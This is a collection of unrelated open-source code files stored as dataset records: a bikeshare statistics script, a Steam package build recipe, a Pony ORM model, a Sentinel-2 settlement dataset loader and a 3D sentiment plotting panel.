successfully.\"})\n","repo_name":"aman0511/coin-drive-test","sub_path":"inventory/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"4331740108","text":"import time\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nCITY_DATA = {'chicago': 'chicago.csv',\r\n 'new york city': 'new_york_city.csv',\r\n 'washington': 'washington.csv'}\r\n\r\n\r\ndef get_filters():\r\n \"\"\"\r\n Asks user to specify a city, month, and day to analyze.\r\n\r\n Returns:\r\n (str) city - name of the city to analyze\r\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\r\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\r\n \"\"\"\r\n print('Hello! Let\\'s explore some US bikeshare data!')\r\n # TO DO: get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle\r\n while True:\r\n city = input(\"\\nEnter the name of city you need (chicago, new york city, washington):\").lower()\r\n if city in ['chicago', 'new york city', 'washington']:\r\n break\r\n else:\r\n print(\"\\n Ops,Please Enter valid city name\")\r\n\r\n # TO DO: get user input for month (all, january, february, ... , june)\r\n while True:\r\n month = input(\"\\n Enter which month you need ( january, february, march, april, may, june) Or (all) to all monthes :\").lower()\r\n if month in ('all', 'january', 'february', 'march', 'april', 'may', 'june'):\r\n break\r\n else:\r\n print(\"\\n Ops,Please Enter valid month name\")\r\n\r\n # get user input for day of week (all, monday, tuesday, ... sunday)\r\n while True:\r\n day = input(\"\\n Enter which day you need (monday, tuesday, wednesday, thursday, friday, saturday, sunday) Or (all) to all days :\").lower()\r\n if day in ('all', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday'):\r\n break\r\n else:\r\n print(\"\\n Ops,Please Enter valid day name\")\r\n\r\n print('-'*40)\r\n return city, month, day\r\n\r\n\r\ndef load_data(city, month, day):\r\n \"\"\"\r\n Loads data for the specified city and filters by month and day if applicable.\r\n\r\n Args:\r\n (str) city - name of the city to analyze\r\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\r\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\r\n Returns:\r\n df - Pandas DataFrame containing city data filtered by month and day\r\n \"\"\"\r\n# i used it from project 3\r\n# load data file into a dataframe\r\n df = pd.read_csv(CITY_DATA[city])\r\n\r\n # convert the Start Time column to datetime\r\n df['Start Time'] = pd.to_datetime(df['Start Time'])\r\n\r\n # extract month , day and hour of week from Start Time to create new columns\r\n df['month'] = df['Start Time'].dt.month\r\n df['day_of_week'] = df['Start Time'].dt.weekday_name\r\n df['start hour'] = df['Start Time'].dt.hour\r\n\r\n # filter by month if applicable\r\n if month != 'all':\r\n # use the index of the months list to get the corresponding int\r\n months = ['january', 'february', 'march', 'april', 'may', 'june']\r\n month = months.index(month) + 1\r\n\r\n # filter by month to create the new dataframe\r\n df = df[df['month'] == month]\r\n\r\n # filter by day of week if applicable\r\n if day != 'all':\r\n # filter by day of week to create the new dataframe\r\n df = df[df['day_of_week'] == day.title()]\r\n\r\n return df\r\n\r\n\r\ndef time_stats(df):\r\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\r\n\r\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\r\n start_time = time.time()\r\n\r\n # TO DO: display the most common month\r\n print(\" \\nMost common month is:\", 
df['month'].mode()[0])\r\n\r\n # TO DO: display the most common day of week\r\n print(\" \\nMost common day is:\", df['day_of_week'].mode()[0])\r\n\r\n # TO DO: display the most common start hour\r\n print(\" \\nMost common start hour is:\", df['start hour'].mode()[0])\r\n\r\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\r\n print('-'*40)\r\n\r\n\r\ndef station_stats(df):\r\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\r\n\r\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\r\n start_time = time.time()\r\n # TO DO: display most commonly used start station\r\n print(\"\\n Most commonly used start station is:\",df['Start Station'].mode()[0])\r\n\r\n # TO DO: display most commonly used end station\r\n print(\"\\n Most commonly used end station is:\", df['End Station'].mode()[0])\r\n\r\n # TO DO: display most frequent combination of start station and end station trip\r\n df['start_to_end'] = df['Start Station']+' ' + df['End Station']\r\n most_start_toend = df['start_to_end'].mode()[0]\r\n print(\"\\n Most frequent combination of start station and end station trip:\", most_start_toend)\r\n\r\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\r\n print('-'*40)\r\n\r\n\r\ndef trip_duration_stats(df):\r\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\r\n\r\n print('\\nCalculating Trip Duration...\\n')\r\n start_time = time.time()\r\n\r\n # TO DO: display total travel time\r\n print(\"\\n Total travel time:\", df['Trip Duration'].sum())\r\n\r\n # TO DO: display mean travel time\r\n print(\"\\n Mean travel time:\", df['Trip Duration'].mean())\r\n\r\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\r\n print('-'*40)\r\n\r\n\r\ndef user_stats(df):\r\n \"\"\"Displays statistics on bikeshare users.\"\"\"\r\n\r\n print('\\nCalculating User Stats...\\n')\r\n start_time = time.time()\r\n\r\n # TO DO: Display counts of user types\r\n try:\r\n print(\"\\n Gender\", df['Gender'].value_counts())\r\n except:\r\n print(\"\\n Ops,there is no data about gender in this city\")\r\n\r\n # TO DO: Display earliest, most recent, and most common year of birth\r\n try:\r\n print(\"\\nEarliest common year of birth\", int(df['Birth Year'].min()))\r\n except:\r\n print(\"\\n Ops,there is no data about year of birth in this city\")\r\n\r\n try:\r\n print(\"\\nMost recent common year of birth\",int(df['Birth Year'].max()))\r\n except:\r\n print(\"\\n Ops,there is no data about year of birth in this city\")\r\n\r\n try:\r\n print(\"\\nMost common common year of birth\",int(df['Birth Year'].mode()[0]))\r\n except:\r\n print(\"\\n Ops, there is no data about year of birth in this city\")\r\n\r\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\r\n print('-'*40)\r\n\r\n\r\ndef display_rows(df):\r\n # ask user to display 5 rowes of data\r\n x = 0\r\n while True:\r\n ask = input(\"Are you need to display next 5 rows of data?\\n choice(yes or no):\").lower()\r\n if ask != 'yes' and ask != 'no':\r\n print(\"\\n Ops ,wrong choice,pleas choice (yes or not)\")\r\n elif ask == 'no':\r\n break\r\n else:\r\n if x+5 < df.shape[0]:\r\n print(df.iloc[x:x+5])\r\n x += 5\r\n\r\n\r\ndef main():\r\n while True:\r\n city, month, day = get_filters()\r\n df = load_data(city, month, day)\r\n\r\n time_stats(df)\r\n station_stats(df)\r\n trip_duration_stats(df)\r\n user_stats(df)\r\n display_rows(df)\r\n\r\n restart = input('\\nWould you like to restart? 
Enter yes or no.\\n')\r\n if restart.lower() != 'yes':\r\n break\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"AhmedAbdelhamed01/Bikeshare-Data","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":7290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
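Editor's note: the bikeshare script above uses Series.dt.weekday_name, which newer pandas removed (dropped in 1.0 in favour of dt.day_name()). A sketch of the same feature extraction with current accessors; the sample timestamps are invented:

import pandas as pd

df = pd.DataFrame({'Start Time': ['2017-01-01 09:07:57', '2017-06-23 17:01:00']})
df['Start Time'] = pd.to_datetime(df['Start Time'])
df['month'] = df['Start Time'].dt.month
df['day_of_week'] = df['Start Time'].dt.day_name()  # replaces .weekday_name
df['start hour'] = df['Start Time'].dt.hour
print(df[['month', 'day_of_week', 'start hour']])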
+{"seq_id":"3887481233","text":"metadata = \"\"\"\nsummary @ Digital distribution client bootstrap package\nhomepage @ http://steampowered.com/\nlicense @ custom\nsrc_url @ http://repo.steampowered.com/steam/pool/steam/s/steam/steam_1.0.0.50.tar.gz\narch @ ~x86_64\noptions @ nls static-libs threads\n\"\"\"\n\nstandard_procedure = False\n\nsrcdir =\"%s\" %name\n\ndef prepare():\n patch(level=1)\n\n\ndef build():\n make()\n \n \ndef install():\n raw_install('DESTDIR=%s' % install_dir)\n # insdoc('AUTHORS', 'LICENSE', 'NEWS', 'README', 'THANKS')\n","repo_name":"wdysln/new","sub_path":"app-games/steam/steam-1.0.0.50.py","file_name":"steam-1.0.0.50.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"34696255666","text":"from pony.orm import Required, Database, set_sql_debug\n\nfrom settings import DB_CONFIG\n\ndb = Database()\n# PostgreSQL\ndb.bind(**DB_CONFIG)\n\n\nclass UserTasks(db.Entity):\n user_id = Required(int)\n name = Required(str)\n date = Required(str)\n task = Required(str)\n\n\ndb.generate_mapping(create_tables=True)\nset_sql_debug(True)\n# UserTasks.get(user_id = 123321)\n","repo_name":"kallarias/tg_bot","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"16269580977","text":"import torch\nimport rasterio as rio\nimport pandas as pd\nimport geopandas as gpd\nimport os\nfrom skimage.morphology import binary_opening\nimport numpy as np\nfrom rasterio import features\nfrom shapely.geometry import shape\nfrom shapely.geometry import Polygon\n\nfrom itertools import product\nimport numpy as np\nimport geopandas as gpd\nfrom torch.utils.data import Dataset\nfrom glob import glob\nfrom torchvision.transforms import Resize\nimport torchvision\nimport rasterio\nfrom torchvision.transforms.functional import resize\nimport numpy as np\nfrom scipy.stats import skewcauchy\nfrom tqdm import tqdm\nfrom copy import copy\n\nBANDS = [\"B01\", \"B02\", \"B03\", \"B04\", \"B05\", \"B06\", \"B07\", \"B08\", \"B8A\", \"B09\", \"B10\", \"B11\", \"B12\"]\n\ndef load_s2_image(imagepath, bounds, expected_image_size):\n left, bottom, right, top = bounds\n\n # extract bands and image sizes\n band_stack = []\n for band in BANDS:\n with rasterio.open(os.path.join(imagepath, band + \".jp2\")) as src:\n patch_window = rasterio.windows.from_bounds(left, bottom, right, top, src.transform)\n band_stack.append(src.read(1, window=patch_window))\n\n # extract dimensions of the B02.jpg band (10m) to rescale other images to this size\n height, width = band_stack[1].shape\n\n size_in_px = expected_image_size // 10\n if height == size_in_px and width == size_in_px:\n\n # bilinearly interpolate all bands to 10m using torch functional resize\n band_stack = [\n resize(torch.from_numpy(b[None].astype(\"int32\")), [height, width]).squeeze(0).numpy() for b in band_stack\n ]\n\n # stack to image [13 x H x W]\n image = np.stack(band_stack)\n\n # valid pixels are where there is no 0 in all bands\n invalid_mask = image.sum(0) == 0\n\n if not np.isnan(image).any():\n\n if not invalid_mask.any():\n\n # prepare metadata for storing a georeferenced patch on disk\n\n # extract transform of the window from a 10m band\n with rasterio.open(os.path.join(imagepath, BANDS[1] + \".jp2\")) as src:\n patch_window = rasterio.windows.from_bounds(left, bottom, right, top, src.transform)\n win_transform = src.window_transform(patch_window)\n profile = src.profile\n profile[\"width\"], profile[\"height\"], profile[\"count\"] = width, height, len(BANDS)\n profile[\"transform\"] = win_transform\n\n return image, profile\n\n # if image not in correct size or contains invalid data\n return None, None\n\nclass SettlementDataset(Dataset):\n def __init__(self, data_path,\n tile,\n imagesize=640, # imagesize in meter\n segmentation=False,\n overwrite=False\n ):\n # prepare data (is skipped if already present)\n mosaik(data_path=data_path, tile=tile, overwrite=overwrite)\n write_urban_tif_and_shape(data_path, tile, overwrite=overwrite)\n\n # initialization\n self.index = gpd.read_file(os.path.join(data_path, \"Test\", tile, \"labels\", \"urban\", f\"{tile}.shp\"), index_col=0)\n self.imagepath = os.path.join(data_path, \"Test\", tile, \"mosaik\")\n self.imagesize = imagesize\n self.segmentation = segmentation\n\n if segmentation:\n gdf = gpd.read_file(os.path.join(data_path, \"Test\", tile, \"labels\", \"vector\", f\"{tile}.shp\"))\n self.shapes = gdf.loc[gdf[\"a_name\"] == \"Urban\"]\n\n print(\"checking samples...\")\n valid = [self[i] is not None for i in tqdm(range(len(self)))]\n self.index = self.index.loc[np.array(valid)]\n print(f\"dropping {(~np.array(valid)).sum()} invalid samples\")\n\n\n def __len__(self):\n return len(self.index)\n\n def __getitem__(self, item):\n geometry = 
self.index.iloc[item].geometry\n x,y = geometry.centroid.x, geometry.centroid.y\n\n left, bottom, right, top = x, y, x + self.imagesize, y + self.imagesize\n bounds = left, bottom, right, top\n\n s2, meta = load_s2_image(self.imagepath, bounds, expected_image_size=self.imagesize)\n\n # stop early if loading failed (is checked for \"checking samples above\")\n if s2 is None:\n return None\n\n if self.segmentation:\n targets = rio.features.rasterize(self.shapes.geometry, all_touched=True,\n transform=meta[\"transform\"], out_shape=s2[0].shape)\n return s2, targets, meta\n else:\n return s2, meta\n \n \n def get_image(self, cx, cy, imagesize):\n\n left, bottom, right, top = cx - imagesize // 2, cy - imagesize // 2, cx + imagesize // 2, cy + imagesize // 2\n bounds = left, bottom, right, top\n\n s2, meta = load_s2_image(self.imagepath, bounds, expected_image_size=imagesize)\n\n targets = rio.features.rasterize(self.shapes.geometry, all_touched=True,\n transform=meta[\"transform\"], out_shape=s2[0].shape)\n\n return s2, targets, meta\n \ndef get_center(m):\n pixel_size = m[\"transform\"].a\n x = m[\"transform\"].c\n y = m[\"transform\"].f\n\n cx = x + m[\"width\"] // 2 * pixel_size\n cy = y - m[\"height\"] // 2 * pixel_size\n return cx, cy\n\n\ndef make_grid(polygon, edge_size):\n \"\"\"\n polygon : shapely.geometry\n edge_size : length of the grid cell\n from https://stackoverflow.com/questions/68770508/st-make-grid-method-equivalent-in-python/68778560#68778560\n \"\"\"\n bounds = polygon.bounds\n x_coords = np.arange(bounds[0] + edge_size / 2, bounds[2], edge_size)\n y_coords = np.arange(bounds[1] + edge_size / 2, bounds[3], edge_size)\n combinations = np.array(list(product(x_coords, y_coords)))\n squares = gpd.points_from_xy(combinations[:, 0], combinations[:, 1]).buffer(edge_size / 2, cap_style=3)\n return gpd.GeoSeries(squares[squares.intersects(polygon)])\n\ndef write_urban_tif_and_shape(data_path, tile, urban_class=7,\n erosion_size=3, overwrite=False,\n simplify_radius=10, edge_size = 640):\n \"\"\"\n creates a raster file of urban areas only. these areas are eroded by a certain amount\n creates a shapefile of settlements by vectoriting the eroded raster file\n \"\"\"\n\n labels_tif = os.path.join(data_path, \"Test\", tile, \"labels\", \"raster\", f\"{tile}.tif\")\n target_tif = os.path.join(data_path, \"Test\", tile, \"labels\", \"urban\", f\"{tile}.tif\")\n target_shp = os.path.join(data_path, \"Test\", tile, \"labels\", \"urban\", f\"{tile}.shp\")\n\n os.makedirs(os.path.dirname(target_tif), exist_ok=True)\n\n if os.path.exists(target_tif) and os.path.exists(target_shp) and not overwrite:\n print(f\"files {target_tif} and {target_shp} exist. 
skipping, specificy overwrite=True to rewrite\")\n return\n\n with rio.open(labels_tif, \"r\") as src:\n lab = (src.read(1) == urban_class)\n lab = binary_opening(lab, footprint=np.ones((erosion_size, erosion_size)))\n lab = np.nan_to_num(lab, nan=255)\n\n profile = src.profile\n profile.update(\n dtype=\"uint8\",\n nodata=\"255\"\n )\n\n with rio.open(target_tif, \"w\", **profile) as dst:\n dst.write(lab, 1)\n print(f\"wrote {target_tif}\")\n\n shapes = features.shapes((lab == 1).astype(\"uint8\"), transform=src.transform)\n\n geoms = [Polygon(record[\"coordinates\"][0]) for (record, i) in shapes]\n gdf = gpd.GeoDataFrame(geometry=geoms, crs=profile[\"crs\"])\n b = gdf.iloc[-1]\n boundary = gpd.GeoDataFrame([1], geometry=[b.geometry], crs=profile[\"crs\"])\n gdf = gdf.iloc[:-2]# drop last row, as it is a polygon of the entire image\n gdf = gdf.dissolve().explode(index_parts=True)\n if simplify_radius > 0:\n gdf.geometry = gdf.geometry.simplify(simplify_radius) # simplify at 10m resolution to avoid pixel corners\n\n # split large polygons into smaller ones\n geometries = []\n for (_, idx), row in gdf.iterrows():\n if row.geometry.area > edge_size**2:\n geoms = make_grid(row.geometry, edge_size=edge_size)\n geoms = gpd.GeoSeries(geoms, crs=profile[\"crs\"])\n split_idx = list(geoms.index)\n geoms.index = [f\"{idx}-{i}\" for i in split_idx]\n geometries.append(geoms)\n else:\n _, idx = row.name\n series = gpd.GeoSeries(row, crs=profile[\"crs\"])\n series.index = [f\"{idx}-0\"]\n geometries.append(series)\n blocks = pd.concat(geometries)\n\n gdf = gpd.clip(blocks, gdf, keep_geom_type=True)\n #msk = (gdf.geometry.type == \"Polygon\") | (gdf.geometry.type == \"MultiPolygon\")\n #multipolys = gdf.loc[]\n #gdf = gdf.loc[msk] # removing GeometryCollections\n\n gdf.to_file(target_shp)\n print(f\"wrote {target_shp}\")\n\ndef mosaik(data_path, tile, overwrite=False):\n target_path = os.path.join(data_path, \"Test\", tile, \"mosaik\")\n os.makedirs(target_path, exist_ok=True)\n bands = glob(os.path.join(data_path, \"Test\", tile, \"*\", \"B*.jp2\"))\n scene = [b.split(\"/\")[-2] for b in bands]\n b = [b.split(\"/\")[-1].replace(\".jp2\", \"\") for b in bands]\n df = pd.DataFrame([bands, scene, b], index=[\"path\", \"scene\", \"band\"]).T\n for band in BANDS:\n trg_file = os.path.join(target_path, f\"{band}.jp2\")\n if os.path.exists(trg_file) and not overwrite:\n print(f\"{trg_file} exists. skipping. 
specify overwrite=True to regenerate mosaik\")\n continue\n\n df_ = df.loc[df.band == band]\n\n arrs = []\n for idx, row in df_.iterrows():\n with rio.open(row.path, \"r\") as src:\n arrs.append(src.read(1))\n profile = src.profile\n\n arrs = np.stack(arrs).astype(\"float16\")\n arrs[arrs == 0] = np.nan\n mosaik = np.nan_to_num(np.nanmin(arrs,axis=0)).astype(\"uint16\")\n\n with rio.open(trg_file, \"w\", **profile) as dst:\n dst.write(mosaik, 1)\n print(f\"writing {trg_file}\")\n\ndef sample_settlements(data_source,\n target_index,\n num_samples=50,\n dist_rv=skewcauchy(a=0.999, loc=5000, scale=10000),\n return_idx_p=False,\n seed=0):\n # makes sure p sums to one\n def normalize(x):\n return (x / x.sum())\n\n target_sample = data_source.index.iloc[target_index]\n geom = target_sample.geometry\n x, y = geom.centroid.x, geom.centroid.y\n\n distances = []\n for idx, row in data_source.index.iterrows():\n c = row.geometry.centroid\n cx, cy = c.x, c.y\n distances.append(np.sqrt((x - cx) ** 2 + (y - cy) ** 2))\n distances = np.array(distances)\n\n p = normalize(dist_rv.pdf(distances))\n\n idxs = np.random.RandomState(seed).choice(np.arange(len(data_source)), replace=False, p=p, size=num_samples)\n\n batch = np.stack([data_source[idx] for idx in idxs])\n\n\n\n if data_source.segmentation:\n X,y, meta = map(list, zip(*batch))\n batch = (np.stack(X), np.stack(y), meta)\n else:\n batch = np.stack(batch)\n\n if return_idx_p:\n return batch, idxs, p\n else:\n return batch\n \ndef sample_negatives(data_source,\n target_index,\n num_samples=50,\n dist_rv=skewcauchy(a=0.999, loc=5000, scale=10000),\n seed=0):\n # makes sure p sums to one\n segmentation = data_source.segmentation\n\n imagesize = data_source.imagesize\n imagepath = data_source.imagepath\n\n target_sample = data_source.index.iloc[target_index]\n geom = target_sample.geometry\n cx, cy = geom.centroid.x, geom.centroid.y\n\n # sample polar coordinates\n n_coordinates = num_samples*4 # sample more coordinates in case some are invalid\n distances = dist_rv.rvs(n_coordinates, random_state=seed)\n angles = np.random.RandomState(seed).randn(n_coordinates) * 2 * np.pi\n\n X = cx + distances * np.cos(angles)\n Y = cy + distances * np.sin(angles)\n\n batch = []\n targets = []\n metas = []\n for x,y in zip(X,Y):\n left, bottom, right, top = x, y, x + imagesize, y + imagesize\n bounds = left, bottom, right, top\n\n s2, meta = load_s2_image(imagepath, bounds, expected_image_size=imagesize)\n if s2 is not None: # if valid\n\n if segmentation:\n t = rio.features.rasterize(data_source.shapes.geometry, all_touched=True,\n transform=meta[\"transform\"], out_shape=s2[0].shape)\n targets.append(t)\n\n batch.append(s2)\n metas.append(meta)\n\n # stop early if sufficient valid samples have been found\n if len(batch) >= num_samples:\n break\n\n if segmentation:\n return np.stack(batch), np.stack(targets), metas\n else:\n return np.stack(batch), metas\n\ndef sample_batch(data_source, target_index, num_shots=10, dist_rv=skewcauchy(a=0.999, loc=5000, scale=10000)):\n num_shots_pos, num_shots_neg = num_shots\n \n pos_batch = sample_settlements(data_source, target_index=target_index, num_samples=num_shots_pos, dist_rv=dist_rv)\n neg_batch = sample_negatives(data_source, target_index=target_index, num_samples=num_shots_neg, dist_rv=dist_rv)\n\n if not data_source.segmentation:\n pos_target = np.ones(pos_batch.shape[0], dtype=int)\n neg_target = np.zeros(pos_batch.shape[0], dtype=int)\n\n return np.vstack([pos_batch, neg_batch]), np.hstack([pos_target, neg_target])\n\n 
else:\n pos_X, pos_target, pos_meta = pos_batch\n neg_X, neg_target, neg_meta = neg_batch\n\n return np.vstack([pos_X, neg_X]), np.vstack([pos_target, neg_target]), pos_meta + neg_meta\n\n\ndef load_uc2_settlement_data(\n num_shots=(200, 600),\n imagesize=10240,\n target_index=600,\n datapath=\"/data/RepreSent/UC2\",\n savepath=None,\n use_cache=False): # f\"/home/marc/Desktop/uc2_settlements/{target_index}\"\n \n if use_cache and savepath is not None:\n data = torch.load(os.path.join(savepath, 'data.npz'))\n return data[\"X\"], data[\"Y\"], data[\"x_test\"], data[\"y_test\"], data[\"buildings\"], data[\"meta\"]\n\n ds = SettlementDataset(datapath, \"37LBL\", segmentation=True)\n\n x, y, meta_ = ds[target_index]\n cx, cy = get_center(meta_)\n\n x_test, y_test, meta = ds.get_image(cx, cy, imagesize=imagesize)\n\n labelprofile = copy(meta)\n labelprofile.update(\n count=1)\n\n dist = skewcauchy(a=0.999, loc=7500, scale=10000)\n print(\"sampling batch\")\n X, Y, train_metas = sample_batch(ds, target_index=target_index, num_shots=num_shots, dist_rv=dist)\n\n X = torch.from_numpy(X) * 1e-4\n Y = torch.from_numpy(Y)\n\n if savepath is not None:\n os.makedirs(savepath, exist_ok=True)\n\n #gdf.to_file(os.path.join(savepath, \"traintiles.shp\"))\n\n with rio.open(os.path.join(savepath, \"sentinel2.tif\"), \"w\", **meta) as dst:\n dst.write(x_test.astype(\"uint16\"))\n\n with rio.open(os.path.join(savepath, \"existing_labels.tif\"), \"w\", **labelprofile) as dst:\n dst.write(y_test.astype(\"uint16\"), 1)\n\n gdf = gpd.read_file(os.path.join(savepath, \"settlements.shp\"))\n with rio.open(os.path.join(savepath, \"sentinel2.tif\"), \"r\") as src:\n buildings = rio.features.rasterize(gdf.to_crs(src.crs).geometry, out_shape=(src.width, src.height),\n transform=src.transform, all_touched=True)\n\n torch.save(dict(\n X=X,\n Y=Y,\n x_test=x_test,\n y_test=y_test,\n buildings=buildings,\n meta=meta),\n os.path.join(savepath, 'data.npz'))\n\n return X, Y, x_test, y_test, buildings, meta\n\ndef main():\n import matplotlib.pyplot as plt\n from skimage.exposure import equalize_hist\n\n # SEGMENTATION\n plt.tight_layout()\n plt.show()\n\n ds = SettlementDataset(\"/data/RepreSent/UC2\", \"37LBL\", segmentation=True)\n X,Y = sample_batch(ds, target_index=200)\n\n fig, axs = plt.subplots(X.shape[0], 2, figsize=(3*2, 3*X.shape[0]))\n for x,y, axs_row in zip(X,Y, axs):\n ax = axs_row[0]\n ax.imshow(equalize_hist(x[np.array([3, 2, 1])]).transpose(1, 2, 0))\n ax.set_xticks([])\n ax.set_yticks([])\n\n ax = axs_row[1]\n ax.imshow(y)\n ax.set_xticks([])\n ax.set_yticks([])\n\n plt.tight_layout()\n plt.show()\n\n # CLASSIFICATION\n ds = SettlementDataset(\"/data/RepreSent/UC2\", \"37LBL\", segmentation=False)\n X,Y = sample_batch(ds, target_index=200)\n\n fig, axs = plt.subplots(X.shape[0], 1, figsize=(3, 3*X.shape[0]))\n for x,y, ax in zip(X,Y, axs):\n ax.imshow(equalize_hist(x[np.array([3, 2, 1])]).transpose(1, 2, 0))\n ax.set_title(\"settlement\" if y == 1 else \"non-settlement\")\n ax.set_xticks([])\n ax.set_yticks([])\n\nif __name__ == '__main__':\n main()\n","repo_name":"ridvansalihkuzu/representlib","sub_path":"represent/datamodules/uc2_settlement_module.py","file_name":"uc2_settlement_module.py","file_ext":"py","file_size_in_byte":17004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
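Editor's note: the dataset above repeatedly burns vector settlement polygons into pixel masks with rasterio.features.rasterize. A self-contained sketch of just that call, with a toy 10 m grid and one invented polygon:

from rasterio import features
from rasterio.transform import from_origin
from shapely.geometry import box

# 64x64 window of 10 m pixels with its top-left corner at (500000, 8200000)
transform = from_origin(500000, 8200000, 10, 10)
shapes = [box(500100, 8199600, 500300, 8199800)]  # one toy settlement polygon

mask = features.rasterize(shapes, out_shape=(64, 64), transform=transform,
                          all_touched=True)
print(mask.sum(), "pixels burned")  # nonzero pixels inside the polygon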
+{"seq_id":"18401814855","text":"from cConstants import cEPAConstants\nfrom cEnum import eEPA\nimport cPlot3D\n\n\nclass cPlotFrame(cPlot3D.cPlotFrame):\n def __init__(self, iParent, **kwargs):\n cPlot3D.cPlotFrame.__init__(self, iParent, **kwargs)\n\n def initPanel(self, *args, **kwargs):\n self.m_PlotPanel = cPlotPanel(self, **kwargs)\n\n\nclass cPlotPanel(cPlot3D.cPlotPanel):\n\n def __init__(self, iParent, iXAxisItem=eEPA.evaluation, iYAxisItem=eEPA.potency, iZAxisItem=eEPA.activity, iPlotType=eEPA.fundamental, **kwargs):\n cPlot3D.cPlotPanel.__init__(self, iParent, **kwargs)\n\n self.m_XAxisItem = iXAxisItem\n self.m_YAxisItem = iYAxisItem\n self.m_ZAxisItem = iZAxisItem\n\n self.m_PlotType = eEPA.fundamental\n\n\n def getSentimentEPAIndex(self, iEPA, iSentiment):\n return iEPA + (cEPAConstants.m_Dimensions * iSentiment)\n\n\n # Axis items are the enumerations of the elements in eEPA, so they're basically numbers\n def setAxis(iXAxisItem, iYAxisItem, iZAxisItem):\n self.m_XAxisItem = iXAxisItem\n self.m_YAxisItem = iYAxisItem\n self.m_ZAxisItem = iZAxisItem\n\n\n def plotEPA(self, iLearnerSamples, iSimulatorSamples):\n self.clearAxes()\n\n if (0 < len(iLearnerSamples)):\n # Learner's sentiments on self and other, green and pink respectively\n self.plotScatter(\n iLearnerSamples[self.getSentimentEPAIndex(self.m_XAxisItem, cEPAConstants.m_SelfMultiplier)],\n iLearnerSamples[self.getSentimentEPAIndex(self.m_YAxisItem, cEPAConstants.m_SelfMultiplier)],\n iLearnerSamples[self.getSentimentEPAIndex(self.m_ZAxisItem, cEPAConstants.m_SelfMultiplier)],\n iAutoScaling=False, iRedraw=False, iUpdate=False, marker=\"o\", s=50, c=\"green\", alpha=1, animated=False)\n\n self.plotScatter(\n iLearnerSamples[self.getSentimentEPAIndex(self.m_XAxisItem, cEPAConstants.m_OtherMultiplier)],\n iLearnerSamples[self.getSentimentEPAIndex(self.m_YAxisItem, cEPAConstants.m_OtherMultiplier)],\n iLearnerSamples[self.getSentimentEPAIndex(self.m_ZAxisItem, cEPAConstants.m_OtherMultiplier)],\n iAutoScaling=False, iRedraw=False, iUpdate=False, marker=\"o\", s=50, c=\"pink\", alpha=1, animated=False)\n\n if (0 < len(iSimulatorSamples)):\n # Simulator's sentiments on self and other, goldenrod and blue respectively\n self.plotScatter(\n iSimulatorSamples[self.getSentimentEPAIndex(self.m_XAxisItem, cEPAConstants.m_SelfMultiplier)],\n iSimulatorSamples[self.getSentimentEPAIndex(self.m_YAxisItem, cEPAConstants.m_SelfMultiplier)],\n iSimulatorSamples[self.getSentimentEPAIndex(self.m_ZAxisItem, cEPAConstants.m_SelfMultiplier)],\n iAutoScaling=False, iRedraw=False, iUpdate=False, marker=\"o\", s=50, c=\"goldenrod\", alpha=1, animated=False)\n\n self.plotScatter(\n iSimulatorSamples[self.getSentimentEPAIndex(self.m_XAxisItem, cEPAConstants.m_OtherMultiplier)],\n iSimulatorSamples[self.getSentimentEPAIndex(self.m_YAxisItem, cEPAConstants.m_OtherMultiplier)],\n iSimulatorSamples[self.getSentimentEPAIndex(self.m_ZAxisItem, cEPAConstants.m_OtherMultiplier)],\n iAutoScaling=False, iRedraw=False, iUpdate=False, marker=\"o\", s=50, c=\"blue\", alpha=1, animated=False)\n\n\n self.m_Axes.set_xlabel(cEPAConstants.m_EPALabels[self.m_XAxisItem])\n self.m_Axes.set_ylabel(cEPAConstants.m_EPALabels[self.m_YAxisItem])\n self.m_Axes.set_zlabel(cEPAConstants.m_EPALabels[self.m_ZAxisItem])\n 
self.redrawAxes()\n","repo_name":"tracydou/EmotionalHandwashingAssistant","sub_path":"lib/bayesact/gui/cPlotEPA3D.py","file_name":"cPlotEPA3D.py","file_ext":"py","file_size_in_byte":3644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
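Editor's note: the panel above is a thin wrapper over matplotlib's 3D scatter machinery. A minimal standalone equivalent; the +/-4.3 range mirrors the usual EPA scale, and the points are random, not real sentiment samples:

import numpy as np
import matplotlib.pyplot as plt

rng = np.random.default_rng(0)
e, p, a = rng.uniform(-4.3, 4.3, (3, 50))

fig = plt.figure()
ax = fig.add_subplot(projection='3d')
ax.scatter(e, p, a, marker='o', s=50, c='green', alpha=1)
ax.set_xlabel('Evaluation')
ax.set_ylabel('Potency')
ax.set_zlabel('Activity')
plt.show()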
